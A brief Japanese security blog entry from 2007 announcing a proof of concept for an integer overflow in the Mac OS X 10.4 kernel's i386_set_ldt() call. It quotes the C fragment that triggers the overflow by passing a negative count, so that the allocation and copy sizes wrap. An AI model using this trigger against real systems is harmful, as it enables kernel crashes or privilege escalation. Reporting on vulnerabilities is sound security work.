2007-11-17 Apple Mac OS X 10.4.x Kernel i386_set_ldt() Integer Overflow PoC セキュリティ MacOSX 10.4.xのKernel脆弱性に関するPoCが出ています。 /* * This will result in kalloc() size argument being 0x00000000 and copyin() * size argument being 0xfffffff8. */ if (i386_set_ldt(1024, (union ldt_entry *)&buf, -1) == -1) { perror("i386_set_ldt"); exit(EXIT_FAILURE); }